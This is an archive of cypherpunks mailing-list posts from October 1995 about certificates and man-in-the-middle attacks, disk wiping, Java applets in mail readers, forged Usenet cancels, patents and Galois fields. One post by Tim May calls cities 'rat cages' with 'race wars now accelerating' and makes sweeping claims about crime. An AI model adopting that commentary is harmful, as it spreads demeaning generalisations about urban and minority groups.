To: hfinney@shell.portal.com
Subject: Re: Certificate proposal
In-Reply-To: <199510061910.MAA06560@comsec.com>
Message-ID: <9510091404.AA12463@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 5 Oct 1995 12:24:34 -0700
>From: Hal <hfinney@shell.portal.com>

>I don't understand this whole discussion.  A certificate is a signed
>binding of a key and a unique name, right?

It depends on how you define certificate.  If you define it this way, then
I'm proposing the elimination of certificates (because I'm eliminating the
unique name as something different from a key).

If you define certificate as I do -- as a bound statement of some attribute
of a key, then it should become clearer.  It's just that the attribute I'm
binding is not some unique person-name -- rather something like permission
to spend money from a bank account.

>I'd like to see some grounding of this discussion in terms of the role of
>certificates, and ways to prevent man in the middle attacks.  I certainly
>have no love for facist worldwide ID cards and hierarchical, organization
>based naming schemes, but just using any old key because it seems to work
>OK most of the time isn't going to fly IMO.

The rest should be more clear if you read the rest of the backlog....

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Mon, 9 Oct 95 08:05:06 PDT
To: perry@piermont.com
Subject: Re: PC disk wipe software
In-Reply-To: <199510091318.JAA24166@jekyll.piermont.com>
Message-ID: <30793a1135c8002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


According to rumor, Perry E. Metzger said:
> 
> 
> I thought I'd ask here, since its related to a lot of the stuff people
> have written for the PC platform in these parts. I need to securely
> wipe a bunch of data from an MS-DOS hard drive, so that it can't be
> recovered. Are there any readily available utilities for this? Will
> any of them selectively erase only data that isn't allocated to
> existing files?
> 

PC Tools has a wipe program that will either wipe individual files, or
wipe all unallocated diskspace. It also allows you to choose the level
of wipe (single overwrite, multiple, etc).

-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Mon, 9 Oct 95 07:19:22 PDT
To: cypherpunks@toad.com
Subject: List Digest
Message-ID: <4XJPcD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Someone asked about a digest form for this list. I got out, dusted off, and
refurbished software I wrote last year to generate a RFC-1153 compatible
digest of alt.security.pgp for PRZ. I am now generating said digest. If
anyone wants it, send e-mail.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: LIBERTY!! Use it or lose it!!

iQCVAwUBMHkut974r4kaz3mVAQHz7wQAqMlM8CwmGGZmycWyPHYO/VJHT2Gr0mn7
G+WKvG1vKhzjP/RhF8hhQzRy5egwIKuasRZaFvV3qMbBheg8JvPwHAPf64/qKkNN
Xf2IRWHKT6BBuzDo5mxv/P4CW9W5lzmWLyDp+BPlNqbMNyMshkRyUTrdriWgtUIK
erJbEMu+7Ec=
=luqz
-----END PGP SIGNATURE-----

--
                        WebCasters(tm)
James C. Grubs                             jgrubs@webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Williams <peter@verisign.com>
Date: Mon, 9 Oct 95 10:30:13 PDT
To: cypherpunks@toad.com
Subject: Re: Software Patents are Freezing Evolution of Products
Message-ID: <199510091730.KAA07041@dustin.verisign.com>
MIME-Version: 1.0
Content-Type: text/plain




>>Thesis: Software patents are a bad idea because they freeze the evolution
>>too early and payment metering schemes are too difficult to arrange, which
>>also helps to freeze evolution. Software patents are bad because customers
>>cannot freely and without entanglements incorporate the ideas into their
>>own products. The situation has become much worse with software, because
>>there is no physical object which can be used to meter usage of a patent.
 
Its nice to see a carefully reasoned argument.

Consider, also reading

http://www.verisign.com/faqs/id_faq.html  
http://www.verisign.com/apple/cis.html

Comment:

The thesis is fundamentally flawed in the case of publickey applications
which provide or exploit digital signatures, as its assumptions are false,
patently. However, a gem of truth is revealed; however, possible outcomes
may be unpalatable as "pay-per-view".

Crypto metering for commercial-grade systems is easy. A number of companies,
including those who are bantering about the latest batch of payment protocols, 
are beginning to really understand that to combat intruder-in-the middle
attacks 
of the commercial end-systems' keying material, its necessary to
authenticate the 
source of keying material used for all subsequent security services. Contrary to
the thesis, there are an ever evolving number of practical ideas upon the nature
of security services and secure applications. (In fact, its ever harder to track
the explosion of innovation which is actually happening.)

To combat the threat which intruder-in-the-middle represents to the key
exchange/agreement crypto underlying most applications, a notion of public-key
certificates was formulated. The certificate is a certified end-system key. 
The evaluation of the certificate requires users to consider trust models, as
someone "trusted" digitally signs the key to assert that the key is certified
for purpose X. The number of trust models being propounded is astounding; the
innovation wonderful to behold; contrary to the thesis. Two models are
prevalent - the 
Kent RFC 1422  model which uses third-parties to base non-repudiation services,
and the  Zimmermann PGP model which does not use third-parties, and accomplishes
something other than non-repudiation. Other models are in heated discussion!

There is a little truth in the thesis that asserting upfront to the
licensor the nature of your idea does hamper innovation. However, a solution
maybe at hand. Note, anyway, that (a) RSA is an excellent public-key scheme 
which is free of patent restrictions anywhere in the world except US 
territories (b) personal use of RSA in the US is effectively unlicensed (see
PGP/PGPfone) (c) RSAREF is a free reference implementation available for
developers to  innovate with, before deciding how to make their ideas
commercially 
available (d)  there are lots of competitive providers of RSA stuff supporting
many form-factors  and packaging styles. So either all innovation occurs in the
US, else free public availability is not the key to idea generation. Both these
conclusions are  patently wrong, in my view.

Whats a solution?

Well there is a solution which gets rid of the up-front, tell-all requirement.
Its called controlled certificate issuance. Given the importance of the
certificate role, if one meters certificate issuance such that a postage-stamp
fee goes to the licensor for each key used in any idea, for any purpose, 
however often or valuable-a-transaction, then the developer is effectively 
freed up - in terms of innovation. The keying material can be Diffie-Helman,
knapsack,
anything the developer like.

Whats the downside - well its like having a pay-per-view box on your company
TV. Still,
this is highly regarded by many industries and is the basis of much
competition in the broadcasting & programming distribution industry. Some
people, really object to pay-per-view. But then, some people object to
inventors getting benefit from their discovery. One metering product is the BBN
safekeyper. Metering certificates causes about as much hate mail, as MIT patent
enforcement though. So beware about even thinking about reading the following
pages for more information about the options and issues: 

http://www.verisign.com/faqs/id_faq.html - for digital ID material (lots of 
references)

http://www.verisign.com/apple/cis.html - for metering and "simple" licensing



How do we do away with the say-it-all-up-front restriction, which is currently
the only means whereby the licensor can collect a negotiated fee?

RSA DSI invested heavily in a hardware product for metering the issuance of
those critical certificates. That is, any developer w






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 10:28:50 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <ac9ea8f3010210049f44@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:46 PM 10/9/95, Hal wrote:
>Bill Stewart <stewarts@ix.netcom.com> writes:
....
>>also a signed attribute statement from the Bank's key that it's a bank, etc.
>>The meaning of the certificates changes a bit, but there's still a certificate
>>from the bank binding Alice's Key to Alice's Bank Account.
>
>I can see using keys with attributes in this way, for credentials or as
>other forms of authorization.  But what about for communications privacy?
>What is the attribute that tells you that using this key will prevent
>eavesdropping?

For communication, the only credential Alice needs to ensure that only Bob
can read her message is that she uses Bob's public key. If "Bob the Key"
reads it, presumably it was "Bob the Person" who read it.

(Again, Bob the Key = Bob the Person to many of us. If Bob the Person has
let his private key out, so that Chuck the Person is also able to read the
Bob the Key stuff, etc., then of course cryptography cannot really handle
this situtation.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jps@monad.semcor.com (Jack P. Starrantino)
Date: Mon, 9 Oct 95 07:42:11 PDT
To: cypherpunks@toad.com
Subject: Re: netscape  mail starts java attachments upon get new mail...
Message-ID: <9510091445.AA01297@monad.semcor.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone remember the problem IBM had back ~10 years on X'mas, when
someone sent an embeded 'script' greeting card to multiple 'profs'
addresses?  When the mail was opened the 'script' procedure was
executed, resulting in the card being forwarded to everyone in the
recipient's address book.  It didn't take too many interations of this
to drag IBM's net to it's knees.

Given JAVA's i/o capabilities, I'm a little concerned about mating it
with my mail reader.

jps
-- 
Jack P. Starrantino     (215) 674-0200 (voice)
SEMCOR, Inc.            (215) 443-0474 (fax)
65 West Street Road     jps@semcor.com
Suite C-100
Warminster, PA 18974



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 9 Oct 95 08:47:51 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Disk Encryption Software
Message-ID: <Pine.ULT.3.91.951009104501.5569B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi all, I figured this was a good crew to ask this question of.  Does 
anybody know of some kind of disc encryption software that would work 
with W95 and a ZIP drive?  What I'd like to be able to have is an 
encrypted disc that when I put it in, it would demand a passphrase, and 
then it would be unlocked for working.  Incorrect passphrase and it's 
still gibberish.  Does this kind of implement exist yet? :-)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMHkoMjokqlyVGmCFAQHHeAP9HfALv1lJxFOhVn18/yjhbS90ekGGo60H
qMF+KcCupdpY/wYYdvImZr2gjbfIGSutI0najla5XJbH5Jp95Gk9Fy5n3SnvJanc
bIIipD+fMBitzjjz54DvEj0TxCYoVJaSeXhKcforfYeuetIA4YwGuksP1yOpivc0
hDOQwxgELDI=
=XXhK
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Mon, 9 Oct 95 08:00:09 PDT
To: Usuario Acceso2 <acceso2@diatel.upm.es>
Subject: Re: Question on Galois Fields
Message-ID: <199510091456.KAA05542@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:13 PM 10/9/95 UTC+0100, you wrote:
>Can anyone explain or give an example of how to use arithmetic in GF(q^n)?
>
>Often in cryptography we work in GF(p). I knew the existence of other fields,
>like elliptic curves and so, but I found a short comment in Applied
>Cryptography page 210 that I couldn't understand.

I wrote a Reed-Solomon encoder that had to do addition and multiplication
over GF(2^8). Addition was simple, just a bitwise exclusive-or.
Multiplication required two tables, a log-alpha table and an alog-alpha
table. The product was computed by taking the anti-log of the sum of
the logs of the arguments. Both tables were 256x8 lookup tables. The table
contents were derived from the generator polynomial G(x) specified
for the encoder. Another two 256x8 tables were used to translate between
dual basis and conventional basis. Dual basis was specified for the
encoder to make a hardware implementation simpler but I found that it was
easier to use conventional basis for a software implementation.

Not being a mathematician, I used several NASA technical reports on
Reed-Solomon encoders and an excellent book on error correcting codes
by Lin & Costello to understand enough of the math to write the
encoder software. Galois fields are heavily used in the design of
error correcting codes.



--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Mon, 9 Oct 95 08:45:40 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <199510091458.AA00712@october.ducktown.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I agree with Tim that the future is likely to hold much evil -- as it
always has -- and that privacy is unfortunately likely to play an
important role in some of that evil -- as it always has.  But my
analysis of the problem has a subtly different perspective.

We mustn't forget that, until very recently, strong, widespread
privacy has been humanity's "default" condition.  The evils to which
Tim alluded would in my opinion be more accurately described as
arising out of general advances in communication and consequent new
market efficiencies.  Progress always has two faces.

The ob-crypto question here is, must we now rely upon pervasive LEA
surveillance as humanity's only effective defense against the new
evils created by technological progress?  In other words, are we
entering an era in which it is simply becoming TOO DANGEROUS to allow
ourselves the traditional luxury of strong, widespread privacy?

Many people, especially in government, seem to be answering the above
question strongly in the affirmative.  The Cypherpunks, on the other
hand, have rallied around the idea that the unprecedented loss of
privacy is itself an evil against which others pale by comparison.

I admit it is a question which troubles me.  I can only fall back on
the principle that, as I believe Thomas Jefferson put it (quoting
approximately from memory), "There is no ultimate safe repository for
power other than in the people."  Our only hope is in ourselves.

					---  mkj

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHk4ZF11Wd4tm8clAQGFfwQAniCTN2dJ+3DrYHFXSq/dPfAzNggxkjlL
r3ImCFcCA8JhXBUnGhon76eGtoAlAuuLMeFktACgI35TS+PU7oLtR/FRq68IxldD
opnY+CA+4JstBkVHhnMfvW3UX4jZeo9MckaHdxwoZtwtM+D/pERw2Mb2M5r/uHA8
FQFfjsl1vBk=
=kC7f
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael H. Warfield <mhw@wittsend.com>
Date: Mon, 9 Oct 95 08:00:15 PDT
To: stu@nemesis.wimsey.com
Subject: Re: Rethinking the utility of netnews "cancel" control messages
In-Reply-To: <m0t2Ffg-0000VgC@nemesis>
Message-ID: <m0t2Jg8-0000rmC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


Stuart Smith enscribed thusly:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In article <v02110105ac99c03922dd@[204.179.132.4]> you write:
> >The downsides of having the mechanism (especially unauthenticated) we see
> >now: official and unofficial squelching of articles that someone doesn't
> >like for whatever arbitrary or situational reason.
> 
> You miss an important point in the mechinism - individual sites *choose*
> whether or not to pay any attention to cancels.  Theoretically, they could
> be configured to only listen to cancels from certain places etc etc.  By all
> means these should be authenticated, but it is vital to remember that this
> is still (for now..) an anarchy.  I don't have to honour anyones cancels,
> and if I do, and you don't like it - you don't have to get a news feed from
> me.

	(No doubt, you are going to get hammered heavily on this from multiple
sides, but here is my shot anyways.)

	Actually you miss a very critical point.  This choice is, in fact,
a "Hobsens Choice", a choice that is no choice.  If any site between you
and the article source choses to honor that cancel, you never get the
original article to begin with.  All you get is the cancel message and your
choice to honor it or not is totally meaningless.  To be worth anything
all of the intermediate nodes would have to chose to ignore cancel messages
and then the leaf nodes would have the privledge of honoring or ignoring
them.  But it will be a VERY cold day in a VERY warm place before that ever
happens, even if it did make sense (It doesn't).

	Yes yes, I know - article loss is contigent upon the cancel arriving
there before you pick up the article from them, this effect would just serve
to add a level of chaos and indetermanancy to the mechanism.  Obviously 
(because of time elements involved in realization and forging of cancels)
it is much more likely that you will receive originals for article where a
forged cancel is received.  That depends on the latency involving all of
the news feeds between you and the article source and the latency involving
the forger and his ability to recognize a message he wants to cancel and
to get that cancel out.  The human factor adds a lot here.  Perhaps we
should add a "time-limit" to cancel messages?  This too would be highly
indeterminant as propagation times stretched out.

	End result is that most sites currently do honor cancels, so many
of the originals never reach a lot of the leaf nodes while all of us
continue to be subjected to a FLOOD of cancel control messages.  In terms
of message count and article numbers (not total bytes of storage) my control
group is the largest newsgroup group on my system!

	Regards,
	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Oct 95 08:16:12 PDT
To: cypherpunks@toad.com
Subject: Crypto's Role in Evil?  HUG_kid
Message-ID: <199510091516.LAA24285@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-9-95. NYPaper:


   "The Greening of U.S. Diplomacy: Focus on Ecology."

      A new concern over the long-term causes of wars and
      disasters of the environment are the issues deemed
      urgent today by American foreign policy makers in much
      the same manner as military threats like new
      surface-to-air missile sites alarmed policy makers
      several decades ago. So in addition to their traditional
      intelligence gathering -- arms, nuclear weapons
      programs, expansion of foreign armies -- American policy
      makers are looking more than ever before at natural
      phenomena in their search for the deeper roots of war
      and threats to global security.

      "During the cold war, most security threats stemmed from
      state-to-state aggression, so most of the analysis was
      of factors that could produce state-to-state
      aggression," said James Steinberg, the State
      Department's director of policy planning. "Now we're
      focusing more on internal factors that can destabilize
      governments and lead to civil wars and ethnic strife.
      Now we're paying much more attention to early warning
      factors, like famine and the environment."

      Angelo Codevilla, an intelligence expert who teaches at
      Boston University, said this new approach is misguided.
      "All this soft stuff is a silly idea," he said.


   HUG_kid  (9 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 11:07:50 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <ac9eafac0202100433c6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:01 PM 10/9/95, Lucky Green wrote:

>Correct, Blanc. That's why I am saving my pennies to buy an AR-15. I know
>the government of the near future will not be in a position to stand in
>the way of my involuntary participation in organ transplant experiments.
>It will be up to the individual and voluntary neighborhood associations,
>etc. to provide our personal security.

While I don't want to comment on AR-15s and the possible need for them,
this being a strong cryptography group, this is a good time to mention to
newcomers to the list that the book "Snow Crash," by Neal Stephenson,
offers a wickedly satirical look at a possible future for America. (Other
books of interest include: Vernor Vinge's "True Names," David Friedman's
"The Machinery of Freedom," Hakim Bey's "TAZ," Orson Scott Card's "Ender's
Game," Ayn Rand's "Atlas Shrugged," and John Brunner's "The Shockwave
Rider.")

One of the reasons I advocate having a minimal set of laws and then
strongly enforcing them is that having too many laws makes enforcement of
the _important_ laws very difficult. Having too many laws, such as the laws
about what one can do with one's own money (chillingly recounted this
morning by Doug Barnes in his trip report), also blurs the lines between
what is really criminal and what it is not.

It's clear that cops cannot protect people, only try to catch the perpetrators.

In certain demographic groups, 30% of all males between the ages of 15 and
30 are either in jail, are awaiting trial, are on probabation, or have been
in jail. California is on a massive prison-building campaign. (Many of
these prisons would not be needed if essentially all behaviors except
murder, rape, theft, etc., were legal, and if transfer payments into inner
cities were cut off...the "criminal" gangs would not have much to do and
would wither away in time.)

Given the current trends, certain courses of action become clear.

(Personal note: I'm amazed at the number of "punks" of various flavors who
continue to live in crowded cities, given the capabilities of
communications technology, and the race wars now accelerating in these rat
cages. But then I'm not one of those dressed-in-black-with-noserings kind
of "punk." To each their own.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Mon, 9 Oct 95 11:52:13 PDT
To: cypherpunks@toad.com
Subject: PC wipe utilities
Message-ID: <199510091852.LAA14988@well.com>
MIME-Version: 1.0
Content-Type: text/plain



"Perry E. Metzger" <perry@piermont.com> asks:

>I thought I'd ask here, since its related to a lot of the stuff
>people have written for the PC platform in these parts. I need to
>securely wipe a bunch of data from an MS-DOS hard drive, so that
>it can't be recovered. Are there any readily available utilities
>for this? Will any of them selectively erase only data that isn't
>allocated to existing files?

>Perry

Alan Penny's  excellent freeware utility wipe.zip has been
uuencoded and sent to you. I believe it fulfills your requirements.

 As recently as the last issue of WIRED an article by a data
recovery company claimed they could recover data that had been
overwritten nine times...... make it a bakers dozen to be safe.


Brian D Williams




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Mon, 9 Oct 95 08:53:23 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: netscape mail starts java attachments upon get new mail...
In-Reply-To: <9510091458.AA27858@alpha>
Message-ID: <LAA00780.199510091552@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9510091458.AA27858@alpha>, Mike McNally writes:
>Jack P. Starrantino writes:
> > Given JAVA's i/o capabilities
>
>Java, per se, doesn't have any "I/O capabilities", in the same way
>that neither C nor C++ do.  That said, it is the case that if your
>mail reader allows incoming applets to send mail, you're in for
>trouble.  

As far as I know Java apps can only make network connections to the
IP address they were loaded from.  There may be more restrictions
then that as well.

So if they were going to mail-bomb they would have to hurt the site
that was giving out the Java app (by sending all the mail to it to
be relayed back), and in fact it could be done more effectavly with
a "simple" CGI script.

This isn't to say it is infeesable - someone could write a gereral
purpose Java applet (say something that makes cool looking animated
bullets for lists) that when loaded from a specific IP address/domain
(say www.clueless.org) would then do something bad.  However exactly
who you can harm isn't exactly as broad as I assume "pranksters" would
like, and how badly you can harm them may not be as harmful as
"terrorists" would like, but it seems to be simpler to do then *I*
would like!

OBcrypto: in one of the Java papers I saw a refrence to use of RSA
signitures to allow browser users to say things like "I trust Sun
(or Tim May) to write applets that use Foo not to harm me".  It
wasn't in the public release of HotJava because of licencing 
constrints.  Any speculation on whether Netscape will (eventually)
support that feature?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Mon, 9 Oct 95 10:00:52 PDT
To: cypherpunks@toad.com
Subject: HTTP anon proxy pointers
Message-ID: <3079552b450e002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


I seem to recall that someone was working on an anonymous http
proxy a couple months ago. Pointers would be appreciated. Thanks.

-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 12:04:29 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <ac9ea8f3010210049f44@[205.199.118.202]>
Message-ID: <199510091903.MAA22499@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
>For communication, the only credential Alice needs to ensure that only Bob
>can read her message is that she uses Bob's public key. If "Bob the Key"
>reads it, presumably it was "Bob the Person" who read it.

>(Again, Bob the Key = Bob the Person to many of us. If Bob the Person has
>let his private key out, so that Chuck the Person is also able to read the
>Bob the Key stuff, etc., then of course cryptography cannot really handle
>this situtation.)

OK, but again, what about the man in the middle attack?  Suppose the
key that you found that claims to be from Bob is actually not his, but
another one created by a man in the middle, such as Bob's malicious
ISP?  Then that ISP is decrypting the messages Alice sends to him using
that fake key, and re-encrypting them using Bob's real key.  He is
reading all of the messages, and Alice and Bob do not in fact have
communications privacy.

I don't want to overstate the risk of this attack.  It would not be an
easy one to mount and I believe there are countermeasures which could
detect it unless the MITM had nearly supernatural powers.  But the MITM
attack is normally considered seriously in discussing crypto protocols.
It is a well known weakness in Diffie-Hellman, for example.  That is why
authenticated Diffie Hellman is used in some of the newly proposed key
exchange protocols for IP.  The risks of MITM attacks on public key
systems was recognized not long after those systems were proposed.  The
problems with fake keys have been discussed for over a decade.

Why is this all suddenly irrelevant?  Were these attacks never realistic?
Is it just not a problem somehow?  I am baffled by the fact that people
are just turning their backs on all these years of research and
experience.  If this is some kind of paradigm shift in which the idea of
communicating with keys is seen as the key to the puzzle, then I am
afraid I don't share the enlightenment.  To me the problem seems as real
as ever.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Mon, 9 Oct 95 12:10:23 PDT
To: tcmay@got.net
Subject: Patents etc
Message-ID: <Pine.3.89.9510091111.C30628-0100000@www2.software.net>
MIME-Version: 1.0
Content-Type: text/plain


Hmmmm the argument about hardware companies paying 10% to intel 5% to the
capacitor folks does not stand up.  The reason is that hardware people do
*exactly* that and in return they receive the physical token (chip,
capacitor etc) that represents the intellectual property they just bought. 

Patents in the hardware world can slow evolution just as much as in 
software.  A good example is the "cats eye" papent in the UK.  Cats eyes 
are the reflective studs in the road, until the original UK patent ran 
out *nobody* did any work in the UK  to improve on the orginal design 
because the royalty burden made it uneconomic.  

Whats make software different is the ability to freely copy it
without special hardware.  This lack of a physical token is what
causes all the problems. 

IMHO What's needed is a) a good way of measuring usage and b) a realistic
attitude on the part of patent holders as to the value of their patents. 

A good example of how not to do it is the current mess that governs the
music indistry (which very similar problems with copying and incorporation
of material [sampling] all be it in a context of copyright rather than
patents). 

Ted Nelson did a lot of work on this for xanadu and his ideas on 
transcopyright are worth exploring further.

John Pettitt                                          jpp@software.net
VP Engineering, CyberSource Corp.       +1 415 473 3065 (V) (fax 3066)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Usuario Acceso2 <acceso2@diatel.upm.es>
Date: Mon, 9 Oct 95 04:13:28 PDT
To: cypherpunks@toad.com
Subject: Question on Galois Fields
Message-ID: <215*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>
MIME-Version: 1.0
Content-Type: text/plain


Hi C'Punks.

Here's a rather mathematical question.

Can anyone explain or give an example of how to use arithmetic in GF(q^n)?

Often in cryptography we work in GF(p). I knew the existence of other fields,
like elliptic curves and so, but I found a short comment in Applied
Cryptography page 210 that I couldn't understand.

Thanks in advance for your help.

Jaime
acceso2@diatel.upm.es





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 10:15:43 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510091558.IAA05131@ix6.ix.netcom.com>
Message-ID: <9510091715.AA27991@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hfinney@shell.portal.com writes:
 > I can see using keys with attributes in this way, for credentials or as
 > other forms of authorization.  But what about for communications privacy?
 > What is the attribute that tells you that using this key will prevent
 > eavesdropping?

If we exchange keys on a face-to-face basis, then I really don't see
much of a MITM threat, unless somehow the MITM has perverted my
original key and I for some reason can't figure that out.  Now, as
long as you communicate with me via the public key I've handed you, we
should be as safe as PKE can make us.

If we are forced to exchange keys remotely, then perhaps some sort of
"proof" techniques could be used to establish to some level of
assurance that the remote entity I *think* is you is really you.  Or
you could provide me with a key, and then I could poll a list of
references to inquire as to the "goodness" of the key.  This seems to
me to be subtly different than a certificate procedure, because I'm
not asking about the goodness of a relationship to the key, but rather
about the key itself.

Maybe I'm missing something.  What is there to trust in a more
"traditional" certificate scheme?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 9 Oct 95 09:24:11 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <v02120d3bac9ef9fd157c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>PC Tools has a wipe program that will either wipe individual files, or
>wipe all unallocated diskspace. It also allows you to choose the level
>of wipe (single overwrite, multiple, etc).

There has been considerable discussion on the MCIP list about how most
*Mac* programs that purport to do this, like Burn, for example, leave stuff
over in disk blocks. My understanding is that this is not a trivial
problem, and it occurs in MUSH-DOS as well....

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 9 Oct 95 12:31:33 PDT
To: hfinney@shell.portal.com (Hal)
